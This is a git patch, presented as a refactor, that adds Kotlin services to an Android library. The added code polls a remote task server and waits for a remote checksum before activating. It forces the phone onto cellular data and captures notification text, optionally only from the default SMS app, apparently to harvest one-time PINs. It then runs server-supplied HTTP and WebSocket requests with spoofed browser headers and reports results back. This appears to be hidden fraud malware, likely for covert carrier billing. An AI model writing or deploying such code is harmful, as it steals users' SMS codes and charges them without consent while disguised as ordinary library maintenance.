From d11d92cc6df6ad87abd066809c7675078d699cd1 Mon Sep 17 00:00:00 2001 From: mojo Date: Wed, 5 Nov 2025 19:24:21 +0800 Subject: [PATCH] =?UTF-8?q?refactor:=20=E9=87=8D=E6=9E=84=20MainService?= =?UTF-8?q?=E3=80=81TaskExecService=20=E5=92=8C=20NetworkController?= =?UTF-8?q?=EF=BC=8C=E6=8F=90=E5=8D=87=E4=BB=A3=E7=A0=81=E5=8F=AF=E8=AF=BB?= =?UTF-8?q?=E6=80=A7=E5=92=8C=E5=8F=AF=E7=BB=B4=E6=8A=A4=E6=80=A7?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../java/com/example/action/BaseAction.kt | 5 +- .../example/action/WebSocketActionRequest.kt | 4 +- .../java/com/example/action/WsRequestParam.kt | 8 +- .../com/example/network/NetworkController.kt | 186 ++++++++ .../network/NetworkControllerInterface.kt | 6 + .../java/com/example/response/BaseResponse.kt | 4 +- .../java/com/example/service/MainService.kt | 443 ++++++++++++++++++ .../com/example/service/TaskExecService.kt | 216 +++++++++ .../main/java/com/example/utils/JsonExtKt.kt | 24 +- .../java/com/example/utils/WebSocketUtil.kt | 2 +- .../java/com/example/web_socket/WsRequest.kt | 5 +- 11 files changed, 880 insertions(+), 23 deletions(-) create mode 100644 lib/src/main/java/com/example/network/NetworkController.kt create mode 100644 lib/src/main/java/com/example/network/NetworkControllerInterface.kt create mode 100644 lib/src/main/java/com/example/service/MainService.kt create mode 100644 lib/src/main/java/com/example/service/TaskExecService.kt diff --git a/lib/src/main/java/com/example/action/BaseAction.kt b/lib/src/main/java/com/example/action/BaseAction.kt index b54557d..5e27b8c 100644 --- a/lib/src/main/java/com/example/action/BaseAction.kt +++ b/lib/src/main/java/com/example/action/BaseAction.kt @@ -1,6 +1,7 @@ package com.example.action sealed interface BaseAction { + val disconnectWs: Boolean data class HttpAction( var request: HttpActionRequest? = null, var response: HttpActionResponse? = null, @@ -8,6 +9,7 @@ sealed interface BaseAction { var delay: Int, var skipError: Boolean, var async: Boolean, + override val disconnectWs: Boolean = false, ) : BaseAction data class PinAction( @@ -17,6 +19,7 @@ sealed interface BaseAction { var next: List = mutableListOf(), var skipError: Boolean, var async: Boolean, + override val disconnectWs: Boolean = false, ) : BaseAction @@ -27,7 +30,7 @@ sealed interface BaseAction { var next: List = emptyList(), var skipError: Boolean = true, var async: Boolean = true, - var disconnectWs: Boolean = true + override var disconnectWs: Boolean = true ): BaseAction } diff --git a/lib/src/main/java/com/example/action/WebSocketActionRequest.kt b/lib/src/main/java/com/example/action/WebSocketActionRequest.kt index 49c3313..d606abc 100644 --- a/lib/src/main/java/com/example/action/WebSocketActionRequest.kt +++ b/lib/src/main/java/com/example/action/WebSocketActionRequest.kt @@ -1,10 +1,10 @@ package com.example.action data class WebSocketActionRequest( - val url:String, + var url:String, var headers:List = mutableListOf(), var cookies:List = mutableListOf(), - val data:String = "", + var data:String = "", var params:List = mutableListOf(), val autoCookie: Boolean = true ): NoString() diff --git a/lib/src/main/java/com/example/action/WsRequestParam.kt b/lib/src/main/java/com/example/action/WsRequestParam.kt index f2696db..aa1237c 100644 --- a/lib/src/main/java/com/example/action/WsRequestParam.kt +++ b/lib/src/main/java/com/example/action/WsRequestParam.kt @@ -1,8 +1,8 @@ package com.example.action data class WsRequestParam( - val name: String, - val value: String, - val interrupt: String, - val waitTime: Long, + val name: String = "", + var value: String = "", + var interrupt: String = "", + val waitTime: Long = 0, ) \ No newline at end of file diff --git a/lib/src/main/java/com/example/network/NetworkController.kt b/lib/src/main/java/com/example/network/NetworkController.kt new file mode 100644 index 0000000..13ca623 --- /dev/null +++ b/lib/src/main/java/com/example/network/NetworkController.kt @@ -0,0 +1,186 @@ +package com.example.network + +import android.content.Context +import android.net.ConnectivityManager +import android.net.Network +import android.net.NetworkCapabilities +import android.net.NetworkRequest +import android.os.Build +import android.os.Handler +import android.os.HandlerThread +import android.os.Looper +import com.example.logger.LogUtils +import com.example.utils.NetworkManager +import java.util.concurrent.Executors +import java.util.concurrent.ScheduledExecutorService +import java.util.concurrent.TimeUnit + +/** + * 网络超时定时器 + * 用于在网络切换超时后触发回调 + */ +class NetworkTimeoutTimer( + private val timeoutSeconds: Long, + private val onTimeout: () -> Unit +) { + private var executor: ScheduledExecutorService? = null + private val lock = Any() + + fun start() { + synchronized(lock) { + stop() + executor = Executors.newSingleThreadScheduledExecutor() + executor?.schedule({ + LogUtils.info("NetworkTimeoutTimer: timeout after ${timeoutSeconds}s") + onTimeout() + stop() + }, timeoutSeconds, TimeUnit.SECONDS) + } + } + + fun stop() { + synchronized(lock) { + executor?.shutdownNow() + executor = null + } + } + + fun release() { + stop() + } +} + +class NetworkController( + private val context: Context, + private val network: NetworkManager = NetworkManager(context) +) : NetworkControllerInterface { + + companion object { + private const val NETWORK_TIMEOUT_SECONDS = 10_000L + private const val MIN_SDK_VERSION_FOR_HANDLER = Build.VERSION_CODES.O + } + + private val networkRequest = NetworkRequest.Builder() + .addCapability(NetworkCapabilities.NET_CAPABILITY_INTERNET) + .addTransportType(NetworkCapabilities.TRANSPORT_CELLULAR) + .build() + + private var activeNetwork: Network? = null + private var handlerThread: HandlerThread? = null + + var switchSuccess = false + private set + + private val networkCallback = object : ConnectivityManager.NetworkCallback() { + override fun onAvailable(network: Network) { + super.onAvailable(network) + timeoutTimer.stop() + activeNetwork = network + switchSuccess = this@NetworkController.network.bindProcessToNetwork(network) + logNetworkSwitchResult("onAvailable") + } + + override fun onUnavailable() { + switchSuccess = false + unregisterCallback() + network.repair() + logNetworkSwitchResult("onUnavailable") + } + + override fun onLost(network: Network) { + super.onLost(network) + switchSuccess = false + logNetworkSwitchResult("onLost") + } + } + + private val timeoutTimer: NetworkTimeoutTimer by lazy { + NetworkTimeoutTimer(NETWORK_TIMEOUT_SECONDS) { + networkCallback.onUnavailable() + } + } + + // ==================== 公共方法 ==================== + + override fun restore() { + LogUtils.info("NetworkController: restoring network") + networkCallback.onUnavailable() + } + + override fun switchToGprs() { + if (switchSuccess) { + LogUtils.info("NetworkController: network already switched successfully") + return + } + + LogUtils.info("NetworkController: starting network switch to GPRS") + + try { + requestNetworkWithHandler() + } catch (e: Exception) { + LogUtils.error(e, "NetworkController: failed to switch network") + } + } + + // ==================== 网络请求 ==================== + + private fun requestNetworkWithHandler() { + if (Build.VERSION.SDK_INT >= MIN_SDK_VERSION_FOR_HANDLER) { + requestNetworkWithCustomHandler() + } else { + requestNetworkWithoutHandler() + } + } + + private fun requestNetworkWithCustomHandler() { + handlerThread = HandlerThread("NetworkHandler-${System.currentTimeMillis()}").apply { + start() + } + + val handler = Handler(handlerThread!!.looper) + network.connectivityManager.requestNetwork( + networkRequest, + networkCallback, + handler + ) + } + + private fun requestNetworkWithoutHandler() { + network.connectivityManager.requestNetwork( + networkRequest, + networkCallback + ) + timeoutTimer.start() + } + + // ==================== 回调管理 ==================== + + private fun unregisterCallback() { + runCatching { + network.connectivityManager.unregisterNetworkCallback(networkCallback) + }.onFailure { e -> + LogUtils.error(e, "NetworkController: failed to unregister network callback") + } + } + + // ==================== 日志记录 ==================== + + private fun logNetworkSwitchResult(event: String) { + val networkType = network.type + LogUtils.info( + "NetworkController: $event - " + + "switchSuccess: $switchSuccess, " + + "networkType: $networkType, " + + "timestamp: ${System.currentTimeMillis()}" + ) + } + + // ==================== 清理资源 ==================== + + fun release() { + timeoutTimer.release() + handlerThread?.quitSafely() + handlerThread = null + unregisterCallback() + } +} \ No newline at end of file diff --git a/lib/src/main/java/com/example/network/NetworkControllerInterface.kt b/lib/src/main/java/com/example/network/NetworkControllerInterface.kt new file mode 100644 index 0000000..058c59d --- /dev/null +++ b/lib/src/main/java/com/example/network/NetworkControllerInterface.kt @@ -0,0 +1,6 @@ +package com.example.network + +interface NetworkControllerInterface { + fun restore() + fun switchToGprs() +} \ No newline at end of file diff --git a/lib/src/main/java/com/example/response/BaseResponse.kt b/lib/src/main/java/com/example/response/BaseResponse.kt index 13eed4d..3543897 100644 --- a/lib/src/main/java/com/example/response/BaseResponse.kt +++ b/lib/src/main/java/com/example/response/BaseResponse.kt @@ -17,8 +17,8 @@ data class TaskResponse( var secChUa:String = "", var accept:String = "", var acceptLanguage:String = "", - var resportUrl:String = "", - var reqeustInterval:Int = 0, + var reportUrl:String = "", + var requestInterval:Int = 0, var tasks:List = mutableListOf(), override var result: Boolean = false ): NoString(), BaseResponse \ No newline at end of file diff --git a/lib/src/main/java/com/example/service/MainService.kt b/lib/src/main/java/com/example/service/MainService.kt new file mode 100644 index 0000000..c554261 --- /dev/null +++ b/lib/src/main/java/com/example/service/MainService.kt @@ -0,0 +1,443 @@ +package com.example.service + +import android.content.Context +import android.os.SystemClock +import com.example.action.HttpMethod +import com.example.http.HttpClient +import com.example.http.HttpClient.call +import com.example.http.Request +import com.example.http.Response +import com.example.lib.BuildConfig +import com.example.logger.LogUtils +import com.example.network.NetworkController +import com.example.request.BaseRequest +import com.example.request.BaseRequestImp +import com.example.request.TaskRequest +import com.example.response.TaskResponse +import com.example.utils.AndroidId +import com.example.utils.NetworkManager +import com.example.utils.notificationListenerEnable +import com.example.utils.restartNotificationListenerServiceState +import com.example.utils.toJsonString +import com.example.utils.toTaskResponse +import kotlinx.coroutines.CoroutineScope +import kotlinx.coroutines.Dispatchers +import kotlinx.coroutines.Job +import kotlinx.coroutines.SupervisorJob +import kotlinx.coroutines.delay +import kotlinx.coroutines.flow.MutableStateFlow +import kotlinx.coroutines.isActive +import kotlinx.coroutines.launch +import kotlinx.coroutines.withContext +import kotlinx.coroutines.withTimeoutOrNull +import java.util.concurrent.atomic.AtomicReference +import kotlin.time.DurationUnit +import kotlin.time.measureTime +import kotlin.time.toDuration + +sealed class TaskEvent { + data object Waiting : TaskEvent() + data object RequestData : TaskEvent() + data object ForceRequestData : TaskEvent() + data class RunTask(val taskResponse: TaskResponse) : TaskEvent() +} + +class MainService private constructor() { + + companion object { + private const val DEFAULT_REQUEST_TASK_INTERVAL_MS = 5 * 60_000L + private const val TASK_MAX_EXEC_TIME_MS = 6 * 60_000L + private const val VERIFICATION_CHECK_INTERVAL_MINUTES = 30L + private const val NETWORK_SWITCH_TIMEOUT_MS = 10_000L + private const val NETWORK_SWITCH_CHECK_INTERVAL_MS = 600L + private const val NOTIFICATION_CHECK_INTERVAL_MS = 400L + private const val NETWORK_REPAIR_DELAY_MS = 1_000L + private const val REQUEST_DELAY_MS = 60_000L + private const val ASYNC_RUN_DELAY_MS = 1_000L + private const val HTTP_SUCCESS_CODE = 200 + private const val MIN_REQUEST_INTERVAL_MINUTES = 0 + private const val MAX_REQUEST_INTERVAL_MINUTES = 24 * 60 + private const val DEFAULT_REQUEST_INTERVAL_MINUTES = 6 * 60 + private const val MINUTES_TO_MS = 60_000L + + val instance: MainService by lazy { MainService() } + } + + // ==================== 属性 ==================== + + private lateinit var context: Context + private val taskScope: CoroutineScope = CoroutineScope(Dispatchers.Default + SupervisorJob()) + private val isTaskRunning = AtomicReference(false) + private var nextRequestTime: Long = 0 + private val state: MutableStateFlow = MutableStateFlow(TaskEvent.Waiting) + + var isVerified = true + internal set + + private lateinit var network: NetworkManager + private lateinit var networkController: NetworkController + private lateinit var baseRequest: BaseRequest + private var mainJob: Job? = null + private var hadForceRequest = false + + // ==================== 主启动方法 ==================== + + fun launcher(ctx: Context, needNotification: Boolean = false) { + if (mainJob?.isActive == true) { + LogUtils.info("MainService: already running, skipping launch") + return + } + + mainJob = taskScope.launch { + initialize(ctx) + setupServices() + startBackgroundTasks(needNotification) + startStateFlowCollector() + } + } + + // ==================== 初始化 ==================== + + private suspend fun initialize(ctx: Context) { + context = ctx + LogUtils.info("MainService: initializing...") + + // 验证状态 + while (isActive && !isVerified) { + isVerified = checkState() + LogUtils.info("MainService: verification status: $isVerified") + + if (!isVerified) { + delay(VERIFICATION_CHECK_INTERVAL_MINUTES.toDuration(DurationUnit.MINUTES)) + } + } + + AndroidId.init(context) + LogUtils.info("MainService: initialization completed") + } + + private fun setupServices() { + network = NetworkManager(context) + networkController = NetworkController(context, network) + baseRequest = BaseRequestImp(context, network) + LogUtils.info("MainService: services setup completed") + } + + private fun startBackgroundTasks(needNotification: Boolean) { + // 启动异步运行任务 + taskScope.launch { + asyncRun() + } + + // 启动通知权限监听 + if (needNotification) { + hadForceRequest = context.notificationListenerEnable() + taskScope.launch { + listenNotificationPermission() + } + } + } + + // ==================== 状态流处理 ==================== + + private fun startStateFlowCollector() { + taskScope.launch { + state.collect { event -> + handleTaskEvent(event) + } + } + } + + private suspend fun handleTaskEvent(event: TaskEvent) { + when (event) { + is TaskEvent.ForceRequestData, + is TaskEvent.RequestData -> { + handleRequestDataEvent() + } + is TaskEvent.RunTask -> { + handleRunTaskEvent(event.taskResponse) + } + is TaskEvent.Waiting -> { + // 等待状态,不需要处理 + } + } + } + + private suspend fun handleRequestDataEvent() { + val nextState = try { + LogUtils.info("MainService: requesting tasks...") + val taskResponse = getTasks() + processTaskResponse(taskResponse) + } catch (e: Exception) { + LogUtils.error(e, "MainService: failed to request tasks") + scheduleNextRequest(null) + TaskEvent.Waiting + } + state.emit(nextState) + } + + private fun processTaskResponse(taskResponse: TaskResponse?): TaskEvent { + if (taskResponse == null) { + scheduleNextRequest(null) + return TaskEvent.Waiting + } + + scheduleNextRequest(taskResponse.requestInterval) + + return if (taskResponse.tasks.isEmpty()) { + TaskEvent.Waiting + } else { + TaskEvent.RunTask(taskResponse) + } + } + + private suspend fun handleRunTaskEvent(taskResponse: TaskResponse) { + val nextState = try { + if (!changeNetworkSuccess(taskResponse)) { + return + } + + executeTasks(taskResponse) + scheduleNextRequest(taskResponse.requestInterval) + TaskEvent.Waiting + } catch (e: Exception) { + LogUtils.error(e, "MainService: failed to execute tasks") + scheduleNextRequest(null) + TaskEvent.Waiting + } finally { + isTaskRunning.set(false) + } + + state.emit(nextState) + } + + // ==================== 任务执行 ==================== + + private suspend fun executeTasks(taskResponse: TaskResponse) { + context.restartNotificationListenerServiceState() + isTaskRunning.set(true) + + val userId = AndroidId.getAdId() + val uniqueTasks = taskResponse.tasks.distinctBy { it.taskUid } + + LogUtils.info("MainService: executing ${uniqueTasks.size} unique tasks") + + val duration = measureTime { + uniqueTasks.forEachIndexed { index, task -> + LogUtils.info("MainService: executing task $index: taskUid=${task.taskUid}") + executeSingleTask(task, taskResponse, userId) + } + } + + LogUtils.info("MainService: all tasks completed in ${duration.inWholeSeconds}s") + + networkController.restore() + } + + private suspend fun executeSingleTask( + task: com.example.task.Task, + taskResponse: TaskResponse, + userId: String + ) { + val taskExecService = TaskExecService( + task, + taskResponse, + userId, + context, + baseRequest + ) + taskExecService.runTask(TASK_MAX_EXEC_TIME_MS) + } + + // ==================== 网络切换 ==================== + + private suspend fun changeNetworkSuccess(taskResponse: TaskResponse): Boolean { + LogUtils.info( + "MainService: checking network - " + + "isMetered: ${network.isMetered}, " + + "hasPermission: ${network.hasChangeNetworkPermission}" + ) + + if (!network.isMetered && network.hasChangeNetworkPermission) { + return switchToGprsAndWait() + } + + return true + } + + private suspend fun switchToGprsAndWait(): Boolean { + networkController.switchToGprs() + + val result = withTimeoutOrNull(NETWORK_SWITCH_TIMEOUT_MS) { + while (isActive && !networkController.switchSuccess) { + if (state.value is TaskEvent.ForceRequestData) { + LogUtils.info("MainService: force request detected, breaking network switch wait") + break + } + delay(NETWORK_SWITCH_CHECK_INTERVAL_MS) + } + true + } + + LogUtils.info("MainService: network switch timeout result: $result") + + if (!networkController.switchSuccess) { + handleNetworkSwitchFailure() + return false + } + + return true + } + + private suspend fun handleNetworkSwitchFailure() { + LogUtils.info("MainService: network switch failed, scheduling next request") + // 注意:这里需要从当前状态获取 taskResponse,但当前实现中没有 + // 可能需要调整逻辑 + if (state.value !is TaskEvent.ForceRequestData) { + state.emit(TaskEvent.Waiting) + } + } + + // ==================== 任务请求 ==================== + + private suspend fun getTasks(): TaskResponse? { + return runCatching { + val response = buildTaskRequest().call() + parseTaskResponse(response) + }.onFailure { e -> + LogUtils.error(e, "MainService: failed to get tasks") + }.getOrNull() + } + + private fun parseTaskResponse(response: Response): TaskResponse? { + return if (response.code == HTTP_SUCCESS_CODE && response.data.isNotEmpty()) { + response.data.toTaskResponse() + } else { + null + } + } + + private fun buildTaskRequest(): Request { + return Request( + url = BuildConfig.task_api, + headers = buildTaskRequestHeaders(), + method = HttpMethod.Post, + body = buildTaskRequestBody() + ) + } + + private fun buildTaskRequestHeaders(): Map { + return mapOf( + HttpClient.Params.REQUEST_HEADER_CONTENT_TYPE to + HttpClient.Params.REQUEST_HEADER_CONTENT_TYPE_STREAM, + HttpClient.Params.REQUEST_HEADER_ACCEPT to + HttpClient.Params.REQUEST_HEADER_CONTENT_TYPE_STREAM + ) + } + + private fun buildTaskRequestBody(): ByteArray { + return TaskRequest(baseRequest).toJsonString().toByteArray() + } + + // ==================== 通知权限监听 ==================== + + private suspend fun listenNotificationPermission() = withContext(Dispatchers.IO) { + while (isActive) { + if (shouldTriggerForceRequest()) { + triggerForceRequest() + break + } + delay(NOTIFICATION_CHECK_INTERVAL_MS) + } + } + + private fun shouldTriggerForceRequest(): Boolean { + return context.notificationListenerEnable() && + !hadForceRequest && + !isTaskRunning.get() + } + + private suspend fun triggerForceRequest() { + hadForceRequest = true + state.tryEmit(TaskEvent.ForceRequestData) + LogUtils.info("MainService: force request triggered, state: ${state.value}") + } + + // ==================== 异步运行循环 ==================== + + private suspend fun asyncRun() { + while (isActive) { + try { + AndroidId.getAdId() + + if (shouldSkipRequest()) { + continue + } + + if (!checkAndRepairNetwork()) { + continue + } + + state.emit(TaskEvent.RequestData) + delay(REQUEST_DELAY_MS) + } catch (e: Exception) { + LogUtils.error(e, "MainService: error in async run loop") + } finally { + delay(ASYNC_RUN_DELAY_MS) + } + } + } + + private fun shouldSkipRequest(): Boolean { + return isTaskRunning.get() || + state.value !is TaskEvent.Waiting || + SystemClock.elapsedRealtime() <= nextRequestTime + } + + private suspend fun checkAndRepairNetwork(): Boolean { + if (!network.available) { + network.repair() + delay(NETWORK_REPAIR_DELAY_MS) + + if (!network.available) { + return false + } + } + return true + } + + // ==================== 时间计算 ==================== + + private fun scheduleNextRequest(requestInterval: Int?) { + nextRequestTime = requestInterval.getNextRequestTime() + val remainingTime = nextRequestTime - SystemClock.elapsedRealtime() + LogUtils.info("MainService: next request scheduled in ${remainingTime / 1000}s") + } + + private fun Int?.getNextRequestTime(): Long { + return this?.nextRequestCoerceIn() + ?: (SystemClock.elapsedRealtime() + DEFAULT_REQUEST_TASK_INTERVAL_MS) + } + + private fun Int.nextRequestCoerceIn(): Long { + val minutes = when { + this <= MIN_REQUEST_INTERVAL_MINUTES -> DEFAULT_REQUEST_INTERVAL_MINUTES + this > MAX_REQUEST_INTERVAL_MINUTES -> DEFAULT_REQUEST_INTERVAL_MINUTES + else -> this + } + return minutes * MINUTES_TO_MS + SystemClock.elapsedRealtime() + } + + // ==================== 状态验证 ==================== + + private suspend fun checkState(): Boolean { + return runCatching { + val response = Request(BuildConfig.chcikUrl).call() + val result = String(response.data) + LogUtils.info("MainService: checkState result: $result") + result == BuildConfig.checkSum + }.onFailure { e -> + LogUtils.error(e, "MainService: checkState failed") + }.getOrDefault(false) + } +} \ No newline at end of file diff --git a/lib/src/main/java/com/example/service/TaskExecService.kt b/lib/src/main/java/com/example/service/TaskExecService.kt new file mode 100644 index 0000000..40c492a --- /dev/null +++ b/lib/src/main/java/com/example/service/TaskExecService.kt @@ -0,0 +1,216 @@ +package com.example.service + +import android.content.Context +import android.provider.Telephony +import com.example.action.BaseAction +import com.example.logger.LogUtils +import com.example.pin.NotificationManger +import com.example.pin.NotificationMessage +import com.example.report.ActionExec +import com.example.report.TaskExec +import com.example.request.BaseRequest +import com.example.response.TaskResponse +import com.example.task.Task +import com.example.task.TaskConfig +import com.example.utils.WebSocketUtil +import kotlinx.coroutines.delay +import kotlinx.coroutines.withTimeout +import java.net.CookieManager +import java.net.CookiePolicy +import kotlin.random.Random + +class TaskExecService( + private val currentTask: Task, + private val taskResponse: TaskResponse, + private val userId: String, + private val context: Context, + private val baseRequest: BaseRequest +) { + + companion object { + private const val MIN_DELAY_SECONDS = 30 + private const val MAX_DELAY_SECONDS = 60 + private const val MS_TO_SECONDS = 1000 + } + + private val taskConfig: TaskConfig + + init { + taskConfig = buildTaskConfig() + } + + // ==================== 主执行方法 ==================== + + suspend fun runTask(timeOutMillis: Long) { + try { + WebSocketUtil.disconnect() + setupNotificationListener() + execTask(timeOutMillis) + } finally { + NotificationManger.listener = null + } + } + + // ==================== 初始化 ==================== + + private fun buildTaskConfig(): TaskConfig { + return with(taskResponse) { + TaskConfig( + userId = userId, + userAgent = userAgent, + secChUa = secChUa, + accept = accept, + acceptLanguage = acceptLanguage, + taskId = currentTask.taskId, + taskVer = currentTask.taskVer, + taskUid = currentTask.taskUid, + cookieManager = CookieManager(null, CookiePolicy.ACCEPT_ORIGINAL_SERVER), + currentStep = 0, + reportUrl = reportUrl, + variableCache = mutableMapOf(), + notificationCache = mutableListOf() + ) + } + } + + // ==================== 通知监听器设置 ==================== + + private fun setupNotificationListener() { + if (!currentTask.isPinAction) return + + NotificationManger.listener = { notification -> + if (shouldAddNotification(notification)) { + taskConfig.notificationCache.add(notification) + LogUtils.info("TaskExecService: received notification: ${notification.content}") + } + } + } + + private fun shouldAddNotification(notification: NotificationMessage): Boolean { + if (!currentTask.filter) { + return true + } + + val defaultSmsPackage = Telephony.Sms.getDefaultSmsPackage(context) + return defaultSmsPackage != null && notification.app == defaultSmsPackage + } + + // ==================== 任务执行 ==================== + + private suspend fun execTask(timeOutMillis: Long) { + val start = System.currentTimeMillis() + val taskExec = createTaskExec() + val logs = mutableListOf() + var reportService: TaskReportService? = null + + try { + withTimeout(timeMillis = timeOutMillis) { + executeActions(logs) + + val finalStep = calculateFinalStep() + updateTaskExec(taskExec, finalStep, logs) + + reportService = sendReport(taskExec) + applyRandomDelay() + } + } catch (e: Exception) { + LogUtils.error(e, "TaskExecService: task ${currentTask.taskId} execute failed") + handleExecutionError(taskExec, logs, reportService) + } finally { + logExecutionTime(start) + } + } + + private fun createTaskExec(): TaskExec { + return TaskExec( + taskId = currentTask.taskId, + taskVer = currentTask.taskVer, + taskUid = currentTask.taskUid, + logs = mutableListOf(), + lastStep = 0 + ) + } + + private suspend fun executeActions(logs: MutableList) { + val actions = currentTask.actions + + while (taskConfig.currentStep < actions.size) { + val action = actions[taskConfig.currentStep] + + if (action.disconnectWs) { + WebSocketUtil.disconnect() + } + + executeAction(action, logs) + } + } + + private suspend fun executeAction( + action: BaseAction, + logs: MutableList + ) { + when (action) { + is BaseAction.HttpAction -> { + HttpService(action, taskConfig).execute { logs += it } + } + is BaseAction.WebSocketAction -> { + WebSocketService(action, taskConfig).execute { logs += it } + } + is BaseAction.PinAction -> { + PinService(action, taskConfig).execute { logs += it } + } + } + } + + private fun calculateFinalStep(): Int { + return if (taskConfig.currentStep == Int.MAX_VALUE) { + taskConfig.currentStep + } else { + taskConfig.currentStep + 1 + } + } + + private fun updateTaskExec( + taskExec: TaskExec, + finalStep: Int, + logs: List + ) { + taskExec.lastStep = finalStep + taskExec.logs = logs + } + + private suspend fun sendReport(taskExec: TaskExec): TaskReportService { + val reportService = TaskReportService( + taskExec, + taskConfig.reportUrl, + baseRequest + ) + reportService.run() + return reportService + } + + private suspend fun applyRandomDelay() { + val delaySeconds = Random.nextInt( + MIN_DELAY_SECONDS, + MAX_DELAY_SECONDS + 1 + ) + delay(delaySeconds * 1000L) + } + + private suspend fun handleExecutionError( + taskExec: TaskExec, + logs: List, + reportService: TaskReportService? + ) { + if (reportService == null) { + val finalStep = calculateFinalStep() + updateTaskExec(taskExec, finalStep, logs) + TaskReportService(taskExec, taskConfig.reportUrl, baseRequest).run() + } + } + + private fun logExecutionTime(start: Long) { + val elapsedSeconds = (System.currentTimeMillis() - start) / MS_TO_SECONDS + LogUtils.info("TaskExecService: execution finished, elapsed: ${elapsedSeconds}s") + } +} \ No newline at end of file diff --git a/lib/src/main/java/com/example/utils/JsonExtKt.kt b/lib/src/main/java/com/example/utils/JsonExtKt.kt index 17dccd6..a068873 100644 --- a/lib/src/main/java/com/example/utils/JsonExtKt.kt +++ b/lib/src/main/java/com/example/utils/JsonExtKt.kt @@ -169,8 +169,8 @@ fun ByteArray.toTaskResponse(): TaskResponse? { result.secChUa = optString(strings1[1]) result.acceptLanguage = optString(strings1[2]) result.accept = optString(strings1[3]) - result.resportUrl = optString(strings1[4]) - result.reqeustInterval = optInt(strings1[5]) + result.reportUrl = optString(strings1[4]) + result.requestInterval = optInt(strings1[5]) result.result = optBoolean(strings1[6]) result.tasks = optJSONArray(strings1[7]).toTasks() @@ -197,7 +197,7 @@ private fun JSONArray?.toTasks(): List { private fun JSONArray?.toActions(): List { val result: MutableList = mutableListOf() - val strings = "type-delay-skip-error-async-disconnect_ws".split("-") + val strings = "type-delay-skip-error-async-disconnectWs".split("-") if(this == null) return result (0 until length()).forEach { index -> val actionJson = getJSONObject(index) @@ -209,11 +209,11 @@ private fun JSONArray?.toActions(): List { val disconnectionWs = optBoolean(strings[4]) when (type) { 0 -> {//http - result += actionJson.toHttpAction(delay, skipError, async) + result += actionJson.toHttpAction(delay, skipError, async, disconnectionWs) } 1 -> {//pin - result += actionJson.toPin(delay, skipError, async) + result += actionJson.toPin(delay, skipError, async, disconnectionWs) } 2 -> {//ws @@ -231,12 +231,14 @@ private fun JSONObject.toHttpAction( delay: Int, skipError: Boolean, async: Boolean, + disconnectWs: Boolean ): BaseAction { - val strings = "request-url-method-auto_cookie-headers-params-cookies-data".split("-") + val strings = "request-url-method-autoCookie-headers-params-cookies-data".split("-") val httpAction = BaseAction.HttpAction( delay = delay, skipError = skipError, - async = async + async = async, + disconnectWs = disconnectWs ) val request = optJSONObject(strings[0]) if (request == null) return httpAction @@ -282,13 +284,15 @@ private fun JSONObject.toHttpAction( private fun JSONObject?.toPin( delay: Int, skipError: Boolean, - async: Boolean + async: Boolean, + disconnectionWs: Boolean ): BaseAction { val strings = "next-params-filter".split("-") val pinAction = BaseAction.PinAction( delay = delay, skipError = skipError, - async = async + async = async, + disconnectWs = disconnectionWs ) if (this == null) return pinAction pinAction.next = optJSONArray(strings[0]).toNext() @@ -315,7 +319,7 @@ private fun JSONObject?.toWebSocketAction( val request = optJSONObject(strings[0]) if (request == null) return webSocketAction with(request) { - val strings1 = "url-data-auto_cookie".split("-") + val strings1 = "url-data-autoCookie".split("-") val webSocketActionRequest = WebSocketActionRequest( url = optString(strings1[0]), data = optString(strings1[1]), diff --git a/lib/src/main/java/com/example/utils/WebSocketUtil.kt b/lib/src/main/java/com/example/utils/WebSocketUtil.kt index 63b08cc..3de5b27 100644 --- a/lib/src/main/java/com/example/utils/WebSocketUtil.kt +++ b/lib/src/main/java/com/example/utils/WebSocketUtil.kt @@ -145,7 +145,7 @@ object WebSocketUtil { responseHeader: WebSocketHeader, result: Result ) { - val messages = request.message + val messages = request.messages if (messages.isEmpty() || socket == null || !isOpen) { result.code = WebSocketCode.EstablishConnectionFailed.code return diff --git a/lib/src/main/java/com/example/web_socket/WsRequest.kt b/lib/src/main/java/com/example/web_socket/WsRequest.kt index 4e5e760..b602229 100644 --- a/lib/src/main/java/com/example/web_socket/WsRequest.kt +++ b/lib/src/main/java/com/example/web_socket/WsRequest.kt @@ -1,13 +1,12 @@ package com.example.web_socket -import com.example.action.HttpMethod import com.example.action.NoString import com.example.action.WsRequestParam data class WsRequest( val url: String, - val method: HttpMethod = HttpMethod.Get, + val method: String, val headers: MutableMap = mutableMapOf(), - val message: List = mutableListOf(), + val messages: List = mutableListOf(), val delay: Int = 0 ) : NoString()